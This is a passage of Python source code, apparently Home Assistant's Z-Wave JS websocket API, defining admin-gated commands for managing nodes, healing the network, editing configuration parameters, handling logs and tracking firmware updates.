    for handler in handlers:
        websocket_api.async_register_command(hass, handler)
    # Plain HTTP views (network dump download, firmware upload).
    hass.http.register_view(DumpView())
    hass.http.register_view(FirmwareUploadView())
@websocket_api.require_admin
@websocket_api.websocket_command(
    {vol.Required(TYPE): "zwave_js/network_status", vol.Required(ENTRY_ID): str}
)
@websocket_api.async_response
@async_get_entry
async def websocket_network_status(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Get the status of the Z-Wave JS network.

    Replies with a snapshot of the server connection state plus controller
    properties, mapped verbatim from the zwave-js-server client/controller
    models.
    """
    controller = client.driver.controller
    data = {
        "client": {
            "ws_server_url": client.ws_server_url,
            "state": "connected" if client.connected else "disconnected",
            "driver_version": client.version.driver_version,
            "server_version": client.version.server_version,
        },
        "controller": {
            "home_id": controller.home_id,
            "library_version": controller.library_version,
            "type": controller.controller_type,
            "own_node_id": controller.own_node_id,
            "is_secondary": controller.is_secondary,
            "is_using_home_id_from_other_network": controller.is_using_home_id_from_other_network,
            "is_sis_present": controller.is_SIS_present,
            "was_real_primary": controller.was_real_primary,
            "is_static_update_controller": controller.is_static_update_controller,
            "is_slave": controller.is_slave,
            "serial_api_version": controller.serial_api_version,
            "manufacturer_id": controller.manufacturer_id,
            "product_id": controller.product_id,
            "product_type": controller.product_type,
            "supported_function_types": controller.supported_function_types,
            "suc_node_id": controller.suc_node_id,
            "supports_timers": controller.supports_timers,
            "is_heal_network_active": controller.is_heal_network_active,
            # Presumably the node IDs known to the controller (nodes is a
            # mapping elsewhere in this module) — iterating yields its keys.
            "nodes": list(client.driver.controller.nodes),
        },
    }
    connection.send_result(
        msg[ID],
        data,
    )
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/node_status",
        vol.Required(ENTRY_ID): str,
        vol.Required(NODE_ID): int,
    }
)
@websocket_api.async_response
@async_get_node
async def websocket_node_status(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    node: Node,
) -> None:
    """Get the status of a Z-Wave JS node."""
    # Reply with a compact status snapshot of the resolved node.
    connection.send_result(
        msg[ID],
        {
            "node_id": node.node_id,
            "is_routing": node.is_routing,
            "status": node.status,
            "is_secure": node.is_secure,
            "ready": node.ready,
        },
    )
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/node_state",
        vol.Required(ENTRY_ID): str,
        vol.Required(NODE_ID): int,
    }
)
@websocket_api.async_response
@async_get_node
async def websocket_node_state(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    node: Node,
) -> None:
    """Get the state data of a Z-Wave JS node."""
    # The node's raw state dictionary is forwarded unmodified.
    connection.send_result(msg[ID], node.data)
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/node_metadata",
        vol.Required(ENTRY_ID): str,
        vol.Required(NODE_ID): int,
    }
)
@websocket_api.async_response
@async_get_node
async def websocket_node_metadata(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    node: Node,
) -> None:
    """Get the metadata of a Z-Wave JS node."""
    # Device-config metadata (manuals, inclusion/exclusion instructions, ...).
    meta = node.device_config.metadata
    connection.send_result(
        msg[ID],
        {
            "node_id": node.node_id,
            "exclusion": meta.exclusion,
            "inclusion": meta.inclusion,
            "manual": meta.manual,
            "wakeup": meta.wakeup,
            "reset": meta.reset,
            "device_database_url": node.device_database_url,
        },
    )
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/ping_node",
        vol.Required(ENTRY_ID): str,
        vol.Required(NODE_ID): int,
    }
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_node
async def websocket_ping_node(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    node: Node,
) -> None:
    """Ping a Z-Wave JS node."""
    # Forward the ping result (success flag) straight to the caller.
    connection.send_result(msg[ID], await node.async_ping())
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/add_node",
        vol.Required(ENTRY_ID): str,
        vol.Optional(SECURE, default=False): bool,
    }
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_add_node(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Add a node to the Z-Wave network.

    Starts inclusion on the controller and streams progress events
    (inclusion, interview, device-registry registration) back to the
    websocket subscription until the client unsubscribes.
    """
    controller = client.driver.controller
    # The driver API takes "include non-secure", the inverse of our flag.
    include_non_secure = not msg[SECURE]

    @callback
    def async_cleanup() -> None:
        """Remove signal listeners."""
        for unsub in unsubs:
            unsub()

    @callback
    def forward_event(event: dict) -> None:
        """Relay a controller/node event name to the websocket client."""
        connection.send_message(
            websocket_api.event_message(msg[ID], {"event": event["event"]})
        )

    @callback
    def forward_stage(event: dict) -> None:
        """Relay an interview-stage event including the stage name."""
        connection.send_message(
            websocket_api.event_message(
                msg[ID], {"event": event["event"], "stage": event["stageName"]}
            )
        )

    @callback
    def node_added(event: dict) -> None:
        """Announce the new node and start forwarding its interview events."""
        node = event["node"]
        # Interview listeners are added to the shared unsubs list so
        # async_cleanup also removes them.
        interview_unsubs = [
            node.on("interview started", forward_event),
            node.on("interview completed", forward_event),
            node.on("interview stage completed", forward_stage),
            node.on("interview failed", forward_event),
        ]
        unsubs.extend(interview_unsubs)
        node_details = {
            "node_id": node.node_id,
            "status": node.status,
            "ready": node.ready,
        }
        connection.send_message(
            websocket_api.event_message(
                msg[ID], {"event": "node added", "node": node_details}
            )
        )

    @callback
    def device_registered(device: DeviceEntry) -> None:
        """Relay the Home Assistant device-registry entry for the new node."""
        device_details = {
            "name": device.name,
            "id": device.id,
            "manufacturer": device.manufacturer,
            "model": device.model,
        }
        connection.send_message(
            websocket_api.event_message(
                msg[ID], {"event": "device registered", "device": device_details}
            )
        )

    # Run cleanup when the websocket subscription ends (unsubscribe/disconnect).
    connection.subscriptions[msg["id"]] = async_cleanup
    # Also stored on msg so async_handle_failed_command can unsubscribe on error.
    msg[DATA_UNSUBSCRIBE] = unsubs = [
        controller.on("inclusion started", forward_event),
        controller.on("inclusion failed", forward_event),
        controller.on("inclusion stopped", forward_event),
        controller.on("node added", node_added),
        async_dispatcher_connect(
            hass, EVENT_DEVICE_ADDED_TO_REGISTRY, device_registered
        ),
    ]

    result = await controller.async_begin_inclusion(include_non_secure)
    connection.send_result(
        msg[ID],
        result,
    )
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/stop_inclusion",
        vol.Required(ENTRY_ID): str,
    }
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_stop_inclusion(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Cancel adding a node to the Z-Wave network."""
    # Ask the controller to leave inclusion mode and forward its answer.
    stopped = await client.driver.controller.async_stop_inclusion()
    connection.send_result(msg[ID], stopped)
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/stop_exclusion",
        vol.Required(ENTRY_ID): str,
    }
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_stop_exclusion(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Cancel removing a node from the Z-Wave network."""
    # Ask the controller to leave exclusion mode and forward its answer.
    stopped = await client.driver.controller.async_stop_exclusion()
    connection.send_result(msg[ID], stopped)
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/remove_node",
        vol.Required(ENTRY_ID): str,
    }
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_remove_node(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Remove a node from the Z-Wave network.

    Starts exclusion on the controller and streams exclusion progress
    back to the websocket subscriber as events.
    """
    controller = client.driver.controller

    @callback
    def async_cleanup() -> None:
        """Remove signal listeners."""
        for unsub in unsubs:
            unsub()

    @callback
    def forward_event(event: dict) -> None:
        # Forward the raw event name to the websocket subscriber.
        connection.send_message(
            websocket_api.event_message(msg[ID], {"event": event["event"]})
        )

    @callback
    def node_removed(event: dict) -> None:
        # Report which node left the network.
        node = event["node"]
        node_details = {
            "node_id": node.node_id,
        }
        connection.send_message(
            websocket_api.event_message(
                msg[ID], {"event": "node removed", "node": node_details}
            )
        )

    # Register cleanup before starting exclusion; unsubs is stored on the
    # message so async_handle_failed_command can clean up on FailedCommand.
    connection.subscriptions[msg["id"]] = async_cleanup
    msg[DATA_UNSUBSCRIBE] = unsubs = [
        controller.on("exclusion started", forward_event),
        controller.on("exclusion failed", forward_event),
        controller.on("exclusion stopped", forward_event),
        controller.on("node removed", node_removed),
    ]
    result = await controller.async_begin_exclusion()
    connection.send_result(
        msg[ID],
        result,
    )
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/replace_failed_node",
        vol.Required(ENTRY_ID): str,
        vol.Required(NODE_ID): int,
        vol.Optional(SECURE, default=False): bool,
    }
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_replace_failed_node(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Replace a failed node with a new node.

    Removes the failed node and re-enters inclusion, streaming both the
    removal and the inclusion/interview progress back as events.
    """
    controller = client.driver.controller
    # SECURE defaults to False, so inclusion is non-secure unless requested.
    include_non_secure = not msg[SECURE]
    node_id = msg[NODE_ID]

    @callback
    def async_cleanup() -> None:
        """Remove signal listeners."""
        for unsub in unsubs:
            unsub()

    @callback
    def forward_event(event: dict) -> None:
        # Forward the raw event name to the websocket subscriber.
        connection.send_message(
            websocket_api.event_message(msg[ID], {"event": event["event"]})
        )

    @callback
    def forward_stage(event: dict) -> None:
        # Interview stage events additionally carry the stage name.
        connection.send_message(
            websocket_api.event_message(
                msg[ID], {"event": event["event"], "stage": event["stageName"]}
            )
        )

    @callback
    def node_added(event: dict) -> None:
        # The replacement node joined: also listen to its interview
        # lifecycle and fold those unsubscribers into the shared list.
        node = event["node"]
        interview_unsubs = [
            node.on("interview started", forward_event),
            node.on("interview completed", forward_event),
            node.on("interview stage completed", forward_stage),
            node.on("interview failed", forward_event),
        ]
        unsubs.extend(interview_unsubs)
        node_details = {
            "node_id": node.node_id,
            "status": node.status,
            "ready": node.ready,
        }
        connection.send_message(
            websocket_api.event_message(
                msg[ID], {"event": "node added", "node": node_details}
            )
        )

    @callback
    def node_removed(event: dict) -> None:
        # Report removal of the failed node being replaced.
        node = event["node"]
        node_details = {
            "node_id": node.node_id,
        }
        connection.send_message(
            websocket_api.event_message(
                msg[ID], {"event": "node removed", "node": node_details}
            )
        )

    @callback
    def device_registered(device: DeviceEntry) -> None:
        # Fired via the dispatcher when Home Assistant creates the device
        # registry entry for the replacement node.
        device_details = {
            "name": device.name,
            "id": device.id,
            "manufacturer": device.manufacturer,
            "model": device.model,
        }
        connection.send_message(
            websocket_api.event_message(
                msg[ID], {"event": "device registered", "device": device_details}
            )
        )

    # Register cleanup before starting; unsubs is stored on the message so
    # async_handle_failed_command can clean up on FailedCommand.
    connection.subscriptions[msg["id"]] = async_cleanup
    msg[DATA_UNSUBSCRIBE] = unsubs = [
        controller.on("inclusion started", forward_event),
        controller.on("inclusion failed", forward_event),
        controller.on("inclusion stopped", forward_event),
        controller.on("node removed", node_removed),
        controller.on("node added", node_added),
        async_dispatcher_connect(
            hass, EVENT_DEVICE_ADDED_TO_REGISTRY, device_registered
        ),
    ]
    result = await controller.async_replace_failed_node(node_id, include_non_secure)
    connection.send_result(
        msg[ID],
        result,
    )
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/remove_failed_node",
        vol.Required(ENTRY_ID): str,
        vol.Required(NODE_ID): int,
    }
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_node
async def websocket_remove_failed_node(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    node: Node,
) -> None:
    """Remove a failed node from the Z-Wave network.

    Streams the resulting "node removed" event back to the subscriber.
    """
    controller = node.client.driver.controller
    node_id = msg[NODE_ID]

    @callback
    def async_cleanup() -> None:
        """Remove signal listeners."""
        for unsub in unsubs:
            unsub()

    @callback
    def node_removed(event: dict) -> None:
        # Report which node was removed from the network.
        node = event["node"]
        node_details = {
            "node_id": node.node_id,
        }
        connection.send_message(
            websocket_api.event_message(
                msg[ID], {"event": "node removed", "node": node_details}
            )
        )

    # Register cleanup before issuing the command; unsubs is stored on the
    # message so async_handle_failed_command can clean up on FailedCommand.
    connection.subscriptions[msg["id"]] = async_cleanup
    msg[DATA_UNSUBSCRIBE] = unsubs = [controller.on("node removed", node_removed)]
    result = await controller.async_remove_failed_node(node_id)
    connection.send_result(
        msg[ID],
        result,
    )
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/begin_healing_network",
        vol.Required(ENTRY_ID): str,
    }
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_begin_healing_network(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Begin healing the Z-Wave network."""
    # Kick off a network-wide heal and forward the controller's answer.
    controller = client.driver.controller
    connection.send_result(msg[ID], await controller.async_begin_healing_network())
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/subscribe_heal_network_progress",
        vol.Required(ENTRY_ID): str,
    }
)
@websocket_api.async_response
@async_get_entry
async def websocket_subscribe_heal_network_progress(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Subscribe to heal Z-Wave network status updates."""
    controller = client.driver.controller

    @callback
    def async_cleanup() -> None:
        """Remove signal listeners."""
        for unsub in unsubs:
            unsub()

    @callback
    def forward_event(key: str, event: dict) -> None:
        # `key` selects the event payload field that carries the per-node
        # heal status: "progress" for updates, "result" when done.
        connection.send_message(
            websocket_api.event_message(
                msg[ID], {"event": event["event"], "heal_node_status": event[key]}
            )
        )

    connection.subscriptions[msg["id"]] = async_cleanup
    msg[DATA_UNSUBSCRIBE] = unsubs = [
        controller.on("heal network progress", partial(forward_event, "progress")),
        controller.on("heal network done", partial(forward_event, "result")),
    ]
    connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/stop_healing_network",
        vol.Required(ENTRY_ID): str,
    }
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_stop_healing_network(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Stop healing the Z-Wave network."""
    # Cancel the running network heal and forward the controller's answer.
    stopped = await client.driver.controller.async_stop_healing_network()
    connection.send_result(msg[ID], stopped)
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/heal_node",
        vol.Required(ENTRY_ID): str,
        vol.Required(NODE_ID): int,
    }
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_heal_node(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Heal a node on the Z-Wave network."""
    # Heal only the requested node and forward the controller's answer.
    controller = client.driver.controller
    connection.send_result(msg[ID], await controller.async_heal_node(msg[NODE_ID]))
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/refresh_node_info",
        vol.Required(ENTRY_ID): str,
        vol.Required(NODE_ID): int,
    },
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_node
async def websocket_refresh_node_info(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    node: Node,
) -> None:
    """Re-interview a node.

    Streams the interview lifecycle events back to the subscriber while
    the refresh runs.
    """

    @callback
    def async_cleanup() -> None:
        """Remove signal listeners."""
        for unsub in unsubs:
            unsub()

    @callback
    def forward_event(event: dict) -> None:
        # Forward the raw event name to the websocket subscriber.
        connection.send_message(
            websocket_api.event_message(msg[ID], {"event": event["event"]})
        )

    @callback
    def forward_stage(event: dict) -> None:
        # Interview stage events additionally carry the stage name.
        connection.send_message(
            websocket_api.event_message(
                msg[ID], {"event": event["event"], "stage": event["stageName"]}
            )
        )

    # Register cleanup before starting; unsubs is stored on the message so
    # async_handle_failed_command can clean up on FailedCommand.
    connection.subscriptions[msg["id"]] = async_cleanup
    msg[DATA_UNSUBSCRIBE] = unsubs = [
        node.on("interview started", forward_event),
        node.on("interview completed", forward_event),
        node.on("interview stage completed", forward_stage),
        node.on("interview failed", forward_event),
    ]
    result = await node.async_refresh_info()
    connection.send_result(msg[ID], result)
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/refresh_node_values",
        vol.Required(ENTRY_ID): str,
        vol.Required(NODE_ID): int,
    },
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_node
async def websocket_refresh_node_values(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    node: Node,
) -> None:
    """Refresh node values."""
    # Request fresh values from the node; the command itself carries no
    # payload back, so acknowledge with an empty result.
    await node.async_refresh_values()
    connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/refresh_node_cc_values",
        vol.Required(ENTRY_ID): str,
        vol.Required(NODE_ID): int,
        vol.Required(COMMAND_CLASS_ID): int,
    },
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_node
async def websocket_refresh_node_cc_values(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    node: Node,
) -> None:
    """Refresh node values for a particular CommandClass."""
    cc_id = msg[COMMAND_CLASS_ID]
    # An unknown numeric id raises ValueError from the enum constructor.
    try:
        command_class = CommandClass(cc_id)
    except ValueError:
        connection.send_error(
            msg[ID], ERR_NOT_FOUND, f"Command class {cc_id} not found"
        )
        return
    await node.async_refresh_cc_values(command_class)
    connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/set_config_parameter",
        vol.Required(ENTRY_ID): str,
        vol.Required(NODE_ID): int,
        vol.Required(PROPERTY): int,
        vol.Optional(PROPERTY_KEY): int,
        vol.Required(VALUE): vol.Any(int, BITMASK_SCHEMA),
    }
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_node
async def websocket_set_config_parameter(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    node: Node,
) -> None:
    """Set a config parameter value for a Z-Wave node."""
    property_ = msg[PROPERTY]
    # PROPERTY_KEY is optional; None means the parameter has no sub-key.
    property_key = msg.get(PROPERTY_KEY)
    value = msg[VALUE]
    try:
        zwave_value, cmd_status = await async_set_config_parameter(
            node, value, property_, property_key=property_key
        )
    except (InvalidNewValue, NotFoundError, NotImplementedError, SetValueFailed) as err:
        # Map library exceptions onto websocket error codes; anything not
        # matched below (SetValueFailed) falls through as "unknown error".
        code = ERR_UNKNOWN_ERROR
        if isinstance(err, NotFoundError):
            code = ERR_NOT_FOUND
        elif isinstance(err, (InvalidNewValue, NotImplementedError)):
            code = ERR_NOT_SUPPORTED
        connection.send_error(
            msg[ID],
            code,
            str(err),
        )
        return
    connection.send_result(
        msg[ID],
        {
            VALUE_ID: zwave_value.value_id,
            STATUS: cmd_status,
        },
    )
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/get_config_parameters",
        vol.Required(ENTRY_ID): str,
        vol.Required(NODE_ID): int,
    }
)
@websocket_api.async_response
@async_get_node
async def websocket_get_config_parameters(
    hass: HomeAssistant, connection: ActiveConnection, msg: dict, node: Node
) -> None:
    """Get a list of configuration parameters for a Z-Wave node."""
    result = {}
    for value_id, zwave_value in node.get_configuration_values().items():
        meta = zwave_value.metadata
        # Serialize the value metadata; "states" is only present when the
        # parameter defines a value-to-label mapping.
        meta_dict = {
            "description": meta.description,
            "label": meta.label,
            "type": meta.type,
            "min": meta.min,
            "max": meta.max,
            "unit": meta.unit,
            "writeable": meta.writeable,
            "readable": meta.readable,
        }
        if meta.states:
            meta_dict["states"] = meta.states
        result[value_id] = {
            "property": zwave_value.property_,
            "property_key": zwave_value.property_key,
            "configuration_value_type": zwave_value.configuration_value_type.value,
            "metadata": meta_dict,
            "value": zwave_value.value,
        }
    connection.send_result(msg[ID], result)
def filename_is_present_if_logging_to_file(obj: dict) -> dict:
    """Validate that filename is provided if log_to_file is True."""
    log_to_file = obj.get(LOG_TO_FILE, False)
    if log_to_file and FILENAME not in obj:
        raise vol.Invalid("`filename` must be provided if logging to file")
    return obj
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/subscribe_log_updates",
        vol.Required(ENTRY_ID): str,
    }
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_subscribe_log_updates(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Subscribe to log message events from the server."""
    driver = client.driver

    @callback
    def async_cleanup() -> None:
        """Remove signal listeners."""
        # Also tell the server to stop emitting log events; scheduled as a
        # task because this cleanup callback itself cannot await.
        hass.async_create_task(driver.async_stop_listening_logs())
        for unsub in unsubs:
            unsub()

    @callback
    def log_messages(event: dict) -> None:
        # Forward a single server log line to the subscriber.
        log_msg: LogMessage = event["log_message"]
        connection.send_message(
            websocket_api.event_message(
                msg[ID],
                {
                    "type": "log_message",
                    "log_message": {
                        "timestamp": log_msg.timestamp,
                        "level": log_msg.level,
                        "primary_tags": log_msg.primary_tags,
                        "message": log_msg.formatted_message,
                    },
                },
            )
        )

    @callback
    def log_config_updates(event: dict) -> None:
        # Forward driver log-config changes to the subscriber.
        log_config: LogConfig = event["log_config"]
        connection.send_message(
            websocket_api.event_message(
                msg[ID],
                {
                    "type": "log_config",
                    "log_config": dataclasses.asdict(log_config),
                },
            )
        )

    msg[DATA_UNSUBSCRIBE] = unsubs = [
        driver.on("logging", log_messages),
        driver.on("log config updated", log_config_updates),
    ]
    connection.subscriptions[msg["id"]] = async_cleanup

    await driver.async_start_listening_logs()
    connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/update_log_config",
        vol.Required(ENTRY_ID): str,
        vol.Required(CONFIG): vol.All(
            vol.Schema(
                {
                    vol.Optional(ENABLED): cv.boolean,
                    # Accept a (case-insensitive) log level name and coerce
                    # it to the LogLevel enum.
                    vol.Optional(LEVEL): vol.All(
                        cv.string,
                        vol.Lower,
                        vol.In([log_level.value for log_level in LogLevel]),
                        lambda val: LogLevel(val),  # pylint: disable=unnecessary-lambda
                    ),
                    vol.Optional(LOG_TO_FILE): cv.boolean,
                    vol.Optional(FILENAME): cv.string,
                    vol.Optional(FORCE_CONSOLE): cv.boolean,
                }
            ),
            # All keys are optional, but at least one must be present, and
            # log_to_file requires filename.
            cv.has_at_least_one_key(
                ENABLED, FILENAME, FORCE_CONSOLE, LEVEL, LOG_TO_FILE
            ),
            filename_is_present_if_logging_to_file,
        ),
    },
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_update_log_config(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Update the driver log config."""
    await client.driver.async_update_log_config(LogConfig(**msg[CONFIG]))
    connection.send_result(
        msg[ID],
    )
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/get_log_config",
        vol.Required(ENTRY_ID): str,
    },
)
@websocket_api.async_response
@async_get_entry
async def websocket_get_log_config(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Get log configuration for the Z-Wave JS driver."""
    # Serialize the LogConfig dataclass into a plain dict for the reply.
    log_config = client.driver.log_config
    connection.send_result(msg[ID], dataclasses.asdict(log_config))
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/update_data_collection_preference",
        vol.Required(ENTRY_ID): str,
        vol.Required(OPTED_IN): bool,
    },
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_update_data_collection_preference(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Update preference for data collection and enable/disable collection."""
    opted_in = msg[OPTED_IN]
    # Persist the preference first, then apply it to the driver.
    update_data_collection_preference(hass, entry, opted_in)
    if not opted_in:
        await client.driver.async_disable_statistics()
    else:
        await async_enable_statistics(client)
    connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/data_collection_status",
        vol.Required(ENTRY_ID): str,
    },
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_data_collection_status(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Return data collection preference and status."""
    # The opt-in preference lives in the config entry; the enabled state
    # is queried live from the driver.
    enabled = await client.driver.async_is_statistics_enabled()
    connection.send_result(
        msg[ID],
        {
            OPTED_IN: entry.data.get(CONF_DATA_COLLECTION_OPTED_IN),
            ENABLED: enabled,
        },
    )
class DumpView(HomeAssistantView):
    """View to dump the state of the Z-Wave JS server."""

    url = "/api/zwave_js/dump/{config_entry_id}"
    name = "api:zwave_js:dump"

    async def get(self, request: web.Request, config_entry_id: str) -> web.Response:
        """Dump the state of Z-Wave.

        Returns the captured server messages as a downloadable JSON file.
        """
        if not request["hass_user"].is_admin:
            raise Unauthorized()
        hass = request.app["hass"]
        # Only loaded entries have data stored under the integration domain.
        if config_entry_id not in hass.data[DOMAIN]:
            raise web_exceptions.HTTPBadRequest
        entry = hass.config_entries.async_get_entry(config_entry_id)
        msgs = await dump.dump_msgs(entry.data[CONF_URL], async_get_clientsession(hass))
        return web.Response(
            body=json.dumps(msgs, indent=2) + "\n",
            headers={
                hdrs.CONTENT_TYPE: "application/json",
                # Serve as an attachment so browsers download the dump.
                hdrs.CONTENT_DISPOSITION: 'attachment; filename="zwave_js_dump.json"',
            },
        )
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/version_info",
        vol.Required(ENTRY_ID): str,
    },
)
@websocket_api.async_response
@async_get_entry
async def websocket_version_info(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    entry: ConfigEntry,
    client: Client,
) -> None:
    """Get version info from the Z-Wave JS server."""
    # Version data was captured at connect time; no server round trip here.
    version = client.version
    connection.send_result(
        msg[ID],
        {
            "driver_version": version.driver_version,
            "server_version": version.server_version,
            "min_schema_version": version.min_schema_version,
            "max_schema_version": version.max_schema_version,
        },
    )
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/abort_firmware_update",
        vol.Required(ENTRY_ID): str,
        vol.Required(NODE_ID): int,
    }
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_node
async def websocket_abort_firmware_update(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    node: Node,
) -> None:
    """Abort a firmware update."""
    # The abort command returns nothing; acknowledge with an empty result.
    await node.async_abort_firmware_update()
    connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
    {
        vol.Required(TYPE): "zwave_js/subscribe_firmware_update_status",
        vol.Required(ENTRY_ID): str,
        vol.Required(NODE_ID): int,
    }
)
@websocket_api.async_response
@async_get_node
async def websocket_subscribe_firmware_update_status(
    hass: HomeAssistant,
    connection: ActiveConnection,
    msg: dict,
    node: Node,
) -> None:
    """Subsribe to the status of a firmware update."""

    @callback
    def async_cleanup() -> None:
        """Remove signal listeners."""
        for unsub in unsubs:
            unsub()

    @callback
    def forward_progress(event: dict) -> None:
        # Stream fragment-level progress of the firmware transfer.
        progress: FirmwareUpdateProgress = event["firmware_update_progress"]
        connection.send_message(
            websocket_api.event_message(
                msg[ID],
                {
                    "event": event["event"],
                    "sent_fragments": progress.sent_fragments,
                    "total_fragments": progress.total_fragments,
                },
            )
        )

    @callback
    def forward_finished(event: dict) -> None:
        # Report the terminal status once the update completes.
        finished: FirmwareUpdateFinished = event["firmware_update_finished"]
        connection.send_message(
            websocket_api.event_message(
                msg[ID],
                {
                    "event": event["event"],
                    "status": finished.status,
                    "wait_time": finished.wait_time,
                },
            )
        )

    msg[DATA_UNSUBSCRIBE] = unsubs = [
        node.on("firmware update progress", forward_progress),
        node.on("firmware update finished", forward_finished),
    ]
    connection.subscriptions[msg["id"]] = async_cleanup
    connection.send_result(msg[ID])
class FirmwareUploadView(HomeAssistantView):
    """View to upload firmware."""

    url = r"/api/zwave_js/firmware/upload/{config_entry_id}/{node_id:\d+}"
    name = "api:zwave_js:firmware:upload"

    async def post(
        self, request: web.Request, config_entry_id: str, node_id: str
    ) -> web.Response:
        """Handle upload.

        Accepts a multipart form with a "file" field containing the
        firmware image and starts the update on the target node.
        """
        if not request["hass_user"].is_admin:
            raise Unauthorized()
        hass = request.app["hass"]
        # Only loaded entries have data stored under the integration domain.
        if config_entry_id not in hass.data[DOMAIN]:
            raise web_exceptions.HTTPBadRequest
